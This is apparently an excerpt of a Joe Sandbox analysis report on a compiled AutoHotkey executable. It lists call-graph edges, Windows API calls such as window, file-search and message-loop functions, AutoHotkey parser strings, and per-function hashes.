77066->77062 77067 40e2d1 GetWindowLongA 77066->77067 77068 40ee11 GetWindowLongA SetWindowLongA 77066->77068 77069 40ee06 DragFinish 77066->77069 77070 40e310 GetKeyState 77066->77070 77074 40de0c GetTickCount 77066->77074 77075 435ebf 160 API calls 77066->77075 77076 4323fd PostMessageA 77066->77076 77077 40ef89 joyGetPosEx PostMessageA 77066->77077 77078 40dcec 93 API calls 77066->77078 77079 417d99 137 API calls 77066->77079 77081 42f256 ShowWindow 77066->77081 77083 40f9bb 297 API calls 3 library calls 77066->77083 77084 40dc06 LoadImageA Shell_NotifyIconA SetCurrentDirectoryA GetTickCount 77066->77084 77085 411b37 142 API calls 77066->77085 77086 42fc15 7 API calls 77066->77086 77087 4395f0 GetWindowRect 77066->77087 77088 40dbd4 49 API calls 77066->77088 77067->77066 77068->77066 77069->77068 77070->77066 77072 4119a5 77071->77072 77073 4119a9 GetTickCount 77071->77073 77072->77073 77073->77022 77074->77023 77075->77066 77076->77066 77077->77066 77078->77066 77079->77066 77080->77022 77081->77066 77082->77022 77083->77066 77084->77036 77085->77066 77086->77066 77087->77048 77088->77066 76740 40466b 76773 422985 76740->76773 76742 402d18 GetTickCount 76744 402d34 PeekMessageA 76742->76744 76749 402cf9 76742->76749 76745 402d56 GetTickCount 76744->76745 76746 402d4b 76744->76746 76745->76749 76746->76745 76747 402e16 GetTickCount 76747->76749 76762 402e47 76747->76762 76748 4029b5 169 API calls 76748->76749 76749->76742 76749->76747 76749->76748 76750 425baf 137 API calls 76749->76750 76753 442502 49 API calls 76749->76753 76754 416d44 37 API calls 76749->76754 76755 40903d 86 API calls 76749->76755 76758 41a263 50 API calls 76749->76758 76759 40184e 47 API calls 76749->76759 76761 43eb88 41 API calls 76749->76761 76749->76762 76766 409f1b 137 API calls 76749->76766 76804 44374a GlobalUnlock CloseClipboard 76749->76804 76805 401fbc 49 API calls 76749->76805 76806 4016b8 169 API calls 76749->76806 76807 40a134 137 API calls 5 library calls 76749->76807 76808 419c22 38 API calls 2 library calls 76749->76808 76809 43ea10 26 API calls ___initmbctable 76749->76809 76812 4013a5 176 API calls 76749->76812 76813 401d5e 47 API calls 76749->76813 76814 443c79 84 API calls 76749->76814 76815 401abf 92 API calls 76749->76815 76816 417d99 137 API calls 76749->76816 76817 44c1bc 137 API calls 2 library calls 76749->76817 76750->76749 76753->76749 76754->76749 76755->76749 76758->76749 76759->76749 76761->76749 76762->76749 76769 40332f RegCloseKey 76762->76769 76810 419eef 38 API calls 76762->76810 76811 40a357 39 API calls 3 library calls 76762->76811 76766->76749 76769->76749 76774 43b175 74 API calls 76773->76774 76775 42299d 76774->76775 76776 4229b5 76775->76776 76818 43b25e 76775->76818 76778 40184e 47 API calls 76776->76778 76780 4229cb 76778->76780 76780->76749 76781 4229d0 76782 4229e4 76781->76782 76830 40137d 37 API calls 76781->76830 76787 4229fb 76782->76787 76831 40137d 37 API calls 76782->76831 76785 422a50 GetWindowRect 76788 422a30 76785->76788 76789 422a5d GetParent 76785->76789 76786 422a20 GetWindowRect 76786->76788 76792 422a36 76786->76792 76787->76785 76787->76786 76832 43b97f GetWindowLongA GetParent GetWindowLongA 76787->76832 76794 40184e 47 API calls 76788->76794 76789->76788 76795 422a82 ScreenToClient 76789->76795 76792->76785 76794->76780 76795->76788 76796 422a9d 76795->76796 76797 422aab 76796->76797 76833 40137d 37 API calls 76796->76833 76799 422ac4 MoveWindow 76797->76799 76834 40137d 37 API calls 76797->76834 76799->76788 76802 422aed 76799->76802 76802->76788 76803 422afb Sleep 76802->76803 76803->76788 76804->76742 76805->76749 76806->76749 76807->76749 76808->76749 76809->76749 76810->76762 76811->76762 76812->76749 76813->76749 76814->76749 76815->76749 76816->76749 76817->76749 76819 43b26b ___initmbctable 76818->76819 76820 4229ac 76819->76820 76821 43b330 GetWindowLongA 76819->76821 76824 43b28f _strlen 76819->76824 76820->76776 76820->76781 76821->76820 76822 43b344 76821->76822 76840 43b9bc GetTopWindow GetTopWindow 76822->76840 76835 43cc62 76824->76835 76826 43b2e7 EnumChildWindows 76826->76820 76828 43b304 76826->76828 76827 43b2ab 76827->76826 76828->76820 76829 43b30d EnumChildWindows 76828->76829 76829->76820 76830->76782 76831->76787 76832->76786 76833->76797 76834->76799 76836 43cc6b 76835->76836 76837 43cc79 76835->76837 76841 4010c5 37 API calls ___initmbctable 76836->76841 76837->76827 76839 43cc76 76839->76827 76840->76820 76841->76839 77089 4048bd 77090 4048c8 77089->77090 77123 43b14c 77090->77123 77092 402d18 GetTickCount 77094 402d34 PeekMessageA 77092->77094 77113 402cf9 77092->77113 77095 402d56 GetTickCount 77094->77095 77096 402d4b 77094->77096 77095->77113 77096->77095 77097 402e16 GetTickCount 77098 402e47 77097->77098 77097->77113 77098->77113 77119 40332f RegCloseKey 77098->77119 77134 419eef 38 API calls 77098->77134 77135 40a357 39 API calls 3 library calls 77098->77135 77099 4029b5 169 API calls 77099->77113 77100 425baf 137 API calls 77100->77113 77103 442502 49 API calls 77103->77113 77104 416d44 37 API calls 77104->77113 77105 40903d 86 API calls 77105->77113 77108 41a263 50 API calls 77108->77113 77109 40184e 47 API calls 77109->77113 77111 43eb88 41 API calls 77111->77113 77113->77092 77113->77097 77113->77098 77113->77099 77113->77100 77113->77103 77113->77104 77113->77105 77113->77108 77113->77109 77113->77111 77116 409f1b 137 API calls 77113->77116 77128 44374a GlobalUnlock CloseClipboard 77113->77128 77129 401fbc 49 API calls 77113->77129 77130 4016b8 169 API calls 77113->77130 77131 40a134 137 API calls 5 library calls 77113->77131 77132 419c22 38 API calls 2 library calls 77113->77132 77133 43ea10 26 API calls ___initmbctable 77113->77133 77136 4013a5 176 API calls 77113->77136 77137 401d5e 47 API calls 77113->77137 77138 443c79 84 API calls 77113->77138 77139 401abf 92 API calls 77113->77139 77140 417d99 137 API calls 77113->77140 77141 44c1bc 137 API calls 2 library calls 77113->77141 77116->77113 77119->77113 77124 43b175 74 API calls 77123->77124 77125 43b160 77124->77125 77126 43b164 SetWindowTextA 77125->77126 77127 43b16e 77125->77127 77126->77127 77127->77113 77128->77092 77129->77113 77130->77113 77131->77113 77132->77113 77133->77113 77134->77098 77135->77098 77136->77113 77137->77113 77138->77113 77139->77113 77140->77113 77141->77113 76842 4046ae 76875 422731 76842->76875 76844 402d18 GetTickCount 76846 402d34 PeekMessageA 76844->76846 76871 402cf9 76844->76871 76847 402d56 GetTickCount 76846->76847 76848 402d4b 76846->76848 76847->76871 76848->76847 76849 402e16 GetTickCount 76855 402e47 76849->76855 76849->76871 76850 4029b5 169 API calls 76850->76871 76851 425baf 137 API calls 76851->76871 76854 416d44 37 API calls 76854->76871 76870 40332f RegCloseKey 76855->76870 76855->76871 76907 419eef 38 API calls 76855->76907 76908 40a357 39 API calls 3 library calls 76855->76908 76856 40903d 86 API calls 76856->76871 76859 41a263 50 API calls 76859->76871 76860 40184e 47 API calls 76860->76871 76862 442502 49 API calls 76862->76871 76863 43eb88 41 API calls 76863->76871 76867 409f1b 137 API calls 76867->76871 76870->76871 76871->76844 76871->76849 76871->76850 76871->76851 76871->76854 76871->76855 76871->76856 76871->76859 76871->76860 76871->76862 76871->76863 76871->76867 76901 44374a GlobalUnlock CloseClipboard 76871->76901 76902 401fbc 49 API calls 76871->76902 76903 4016b8 169 API calls 76871->76903 76904 40a134 137 API calls 5 library calls 76871->76904 76905 419c22 38 API calls 2 library calls 76871->76905 76906 43ea10 26 API calls ___initmbctable 76871->76906 76909 4013a5 176 API calls 76871->76909 76910 401d5e 47 API calls 76871->76910 76911 443c79 84 API calls 76871->76911 76912 401abf 92 API calls 76871->76912 76913 417d99 137 API calls 76871->76913 76914 44c1bc 137 API calls 2 library calls 76871->76914 76876 43b175 74 API calls 76875->76876 76877 42277d 76876->76877 76878 42278d 76877->76878 76879 43b25e 42 API calls 76877->76879 76880 4227f0 76878->76880 76881 42279f 76878->76881 76879->76878 76882 4227ff GetWindowRect GetWindowRect 76880->76882 76915 43b97f GetWindowLongA GetParent GetWindowLongA 76880->76915 76883 4227b1 76881->76883 76887 40184e 47 API calls 76881->76887 76885 42282e 76882->76885 76886 42281f 76882->76886 76888 4227c4 76883->76888 76892 40184e 47 API calls 76883->76892 76891 422843 76885->76891 76894 401c1f 47 API calls 76885->76894 76890 401c1f 47 API calls 76886->76890 76887->76883 76893 4227d7 76888->76893 76896 40184e 47 API calls 76888->76896 76889 4227fe 76889->76882 76890->76885 76895 422858 76891->76895 76898 401c1f 47 API calls 76891->76898 76892->76888 76897 4227ee 76893->76897 76899 40184e 47 API calls 76893->76899 76894->76891 76895->76897 76900 401c1f 47 API calls 76895->76900 76896->76893 76897->76871 76898->76895 76899->76897 76900->76897 76901->76844 76902->76871 76903->76871 76904->76871 76905->76871 76906->76871 76907->76855 76908->76855 76909->76871 76910->76871 76911->76871 76912->76871 76913->76871 76914->76871 76915->76889

                                  Executed Functions

                                  Function 0043A0D6, Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 374windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 0043A142
                                  • IsWindowVisible.USER32(00000000), ref: 0043A15C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: Window$ForegroundVisible
                                  • String ID: %s1$0x%06X$0x%08X$GetLayeredWindowAttributes$Parameter #2 invalid The current thread will exit.$user32$|F
                                  • API String ID: 4078700383-1274300297
                                  • Opcode ID: 1c9fd4bae640fcd2214e2f992035485e87fe38ead885d97b3cdcfba6b7e02af4
                                  • Instruction ID: 30f3734cdbfc59d20499853ff34ac54e128330569c50452545ac2bbec5ad5d36
                                  • Opcode Fuzzy Hash: 1c9fd4bae640fcd2214e2f992035485e87fe38ead885d97b3cdcfba6b7e02af4
                                  • Instruction Fuzzy Hash: 0EC17771980249BFEF219F609C84DAF3B68EB18354F04112BF98163291E7798DB0D76B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043892A, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _strlen.LIBCMT ref: 0043894B
                                  • FindFirstFileA.KERNELBASE(00419000,?), ref: 004389F1
                                  • FindClose.KERNELBASE(00000000), ref: 004389FC
                                  • FindFirstFileA.KERNELBASE(00419000,?), ref: 00438A39
                                  • FindClose.KERNEL32(00000000), ref: 00438A41
                                  • _strcat.LIBCMT ref: 00438A6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst$_strcat_strlen
                                  • String ID: %s\
                                  • API String ID: 2672021315-2802346739
                                  • Opcode ID: 7ad55399da6226dd210e06094532e1ce714c09964b899d1c4dbe98c773ce23f4
                                  • Instruction ID: 1d5ba978f34377bd5a123d48c71260a2a32a68d89ba771acaf866bb5d6b448ca
                                  • Opcode Fuzzy Hash: 7ad55399da6226dd210e06094532e1ce714c09964b899d1c4dbe98c773ce23f4
                                  • Instruction Fuzzy Hash: DE3168B15043112AE721B2645C86FBFB76C8F05319F14025FFE44E21C3EA6CDA4986AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004481E0, Relevance: 85.6, APIs: 12, Strings: 36, Instructions: 1558COMMON
                                  Download Yara Rule
                                  APIs
                                  • _strlen.LIBCMT ref: 00448512
                                  • _strlen.LIBCMT ref: 00448561
                                  • _strcat.LIBCMT ref: 00448A88
                                  • _strlen.LIBCMT ref: 00448B7A
                                  • GetKeyboardLayout.USER32(00000000), ref: 00448CCA
                                  • _strlen.LIBCMT ref: 00448D17
                                  • IsCharUpperA.USER32(00000000), ref: 00448D27
                                  • _strcat.LIBCMT ref: 00449175
                                  • _strcat.LIBCMT ref: 00449250
                                    • Part of subcall function 0044B395: _strlen.LIBCMT ref: 0044B587
                                    • Part of subcall function 00449D8E: _strlen.LIBCMT ref: 00449F67
                                  • GetKeyboardLayout.USER32(00000000), ref: 00448C96
                                    • Part of subcall function 00449D8E: _strcat.LIBCMT ref: 00449DB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: _strlen$_strcat$KeyboardLayout$CharUpper
                                  • String ID: ,{$ ,$ & $#CommentFlag$%s%s$*%s up::$*%s::$,%`$<>=/|^,:$<>=/|^,:.+-*&!?~$>AHK WITH ICON<$>AUTOHOTKEY SCRIPT<$?*- $Continuation section too long.$Could not extract script from EXE.$Duplicate hotkey.$EXE corrupted$Else$Functions cannot contain functions.$Hotkeys/hotstrings are not allowed inside functions.$IfWin should be #IfWin.$Join$LTrim$Missing ")"$Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.$Out of memory.$RTrim$Return$This hotstring is missing its abbreviation.$This line does not contain a recognized action.$and$if not GetKeyState("%s")${Blind}%s%s{%s DownTemp}${Blind}{%s Up}${LCtrl up}${RCtrl up}
                                  • API String ID: 68603563-2895020247
                                  • Opcode ID: ea27803c1cfdd466fc29f62928051f5a293da7bd26396b5dd74b233aecf54e9e
                                  • Instruction ID: 2f926e27880df875bb426dd24dd24ce971476d89d0bbec2cd2f68173f7ecaac0
                                  • Opcode Fuzzy Hash: ea27803c1cfdd466fc29f62928051f5a293da7bd26396b5dd74b233aecf54e9e
                                  • Instruction Fuzzy Hash: CDB2F2B1904389AEFF219F658C41AAF3BA9AB05304F18005FFD4493282EB7DDD85DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004041E7, Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 255windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402D18
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00402D41
                                  • GetTickCount.KERNEL32 ref: 00402D56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: CountTick$MessagePeek
                                  • String ID: ahk_group$|F$|F$|F
                                  • API String ID: 4145102785-356675740
                                  • Opcode ID: ecff729579a421bb5e63e2f9f0cb05814ea874d75497c68c5821a4ea58975dfd
                                  • Instruction ID: 2d56ba2902ec9480f7bdf884abf6a6057acf4d447392e6514723756f83d3457c
                                  • Opcode Fuzzy Hash: ecff729579a421bb5e63e2f9f0cb05814ea874d75497c68c5821a4ea58975dfd
                                  • Instruction Fuzzy Hash: ECA1F671A00140AFDB14CB64DD58BAA3762AB86314F24017BF5017B3E2DBBD9C52DB5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004048BD, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 180windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402D18
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00402D41
                                  • GetTickCount.KERNEL32 ref: 00402D56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: CountTick$MessagePeek
                                  • String ID: |F$|F
                                  • API String ID: 4145102785-1738744721
                                  • Opcode ID: 6e007be50082ce341756d9323c3295e72947e749ac31496456cc52d48ff50f93
                                  • Instruction ID: 71495d49f13e58bd2a388b70dddf0dbc983b06023eb0c0ac0129a92d0c5a6d2c
                                  • Opcode Fuzzy Hash: 6e007be50082ce341756d9323c3295e72947e749ac31496456cc52d48ff50f93
                                  • Instruction Fuzzy Hash: B661E430904100AFDB14CB14DE98BAA3772BB46314F24427BE5167B3E2D7B99C82DB5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404947, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 171windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402D18
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00402D41
                                  • GetTickCount.KERNEL32 ref: 00402D56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: CountTick$MessagePeek
                                  • String ID: |F$|F
                                  • API String ID: 4145102785-1738744721
                                  • Opcode ID: 08787888f9aa9efbd0b789b3be9d6e81a510bcc5e4e79091a9e81d40487d64f0
                                  • Instruction ID: b210648bc392f8644b6b696856e095dff36365a822abb1eff7acf04347152c16
                                  • Opcode Fuzzy Hash: 08787888f9aa9efbd0b789b3be9d6e81a510bcc5e4e79091a9e81d40487d64f0
                                  • Instruction Fuzzy Hash: 1461C331904100AFDB14CB54DE98BAA3372BB46314F24427BE5167B3E2D7B99C82DB4E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00422985, Relevance: 9.2, APIs: 6, Instructions: 162sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0043B175: GetForegroundWindow.USER32(?,?,?,00421C0C,?,?,?,?,0045BF4C,000000FF,00000000,00000001), ref: 0043B1A5
                                    • Part of subcall function 0043B175: IsWindowVisible.USER32(00000000), ref: 0043B1BF
                                  • GetWindowRect.USER32 ref: 00422A2A
                                  • GetWindowRect.USER32 ref: 00422A57
                                  • GetParent.USER32(?), ref: 00422A76
                                  • ScreenToClient.USER32 ref: 00422A87
                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?), ref: 00422ADA
                                  • Sleep.KERNEL32(?,?,?,?,?,?,?), ref: 00422AFC
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: Window$Rect$ClientForegroundMoveParentScreenSleepVisible
                                  • String ID:
                                  • API String ID: 1878330633-0
                                  • Opcode ID: fa73e185c38e650b900f3b726c76858e8ba5eb11e404633ee4454d30bf2da752
                                  • Instruction ID: 39886ace2ed0127c387f7d6ffe18d0c2220eda8f26c3f2c9cf0d69e3ac9f78a9
                                  • Opcode Fuzzy Hash: fa73e185c38e650b900f3b726c76858e8ba5eb11e404633ee4454d30bf2da752
                                  • Instruction Fuzzy Hash: 98519071A00214BBDF21DFA4ED45FAE7BB5AB08714F640157F901B72A0D6B89D80CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004508C7, Relevance: 3.2, APIs: 2, Instructions: 180COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000001), ref: 004508EE
                                  • _strlen.LIBCMT ref: 00450935
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: FileModuleName_strlen
                                  • String ID:
                                  • API String ID: 2404361900-0
                                  • Opcode ID: 6786677fbda590c6a22c7dd65a0eabaf172d6d5f6225d38f36aa644cb334baef
                                  • Instruction ID: b51048c0fecb03b846f904b7d50934b282fe1d19af751397b2c6b26723520ed5
                                  • Opcode Fuzzy Hash: 6786677fbda590c6a22c7dd65a0eabaf172d6d5f6225d38f36aa644cb334baef
                                  • Instruction Fuzzy Hash: 75513C75500209BFEB219F65CC41FAE77E8EF1430AF20485FF995A61C3DA799948CB24
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043B14C, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0043B175: GetForegroundWindow.USER32(?,?,?,00421C0C,?,?,?,?,0045BF4C,000000FF,00000000,00000001), ref: 0043B1A5
                                    • Part of subcall function 0043B175: IsWindowVisible.USER32(00000000), ref: 0043B1BF
                                  • SetWindowTextA.USER32(00000000,?), ref: 0043B168
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp Download File
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: Window$ForegroundTextVisible
                                  • String ID:
                                  • API String ID: 1219604373-0
                                  • Opcode ID: 2ab10a3a18ace8b9c2a49fb536910430000d498c40e5137b22ea62d7743b1c95
                                  • Instruction ID: 85f29ec61d4946dd2e62b39def5cb1f3a84b896b0130af332fcaedf73bafd27f
                                  • Opcode Fuzzy Hash: 2ab10a3a18ace8b9c2a49fb536910430000d498c40e5137b22ea62d7743b1c95
                                  • Instruction Fuzzy Hash: 03D0923200020DBB9F026FA1DD0AA9B3F6AEF09395F004421FE1585031D736C931ABA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions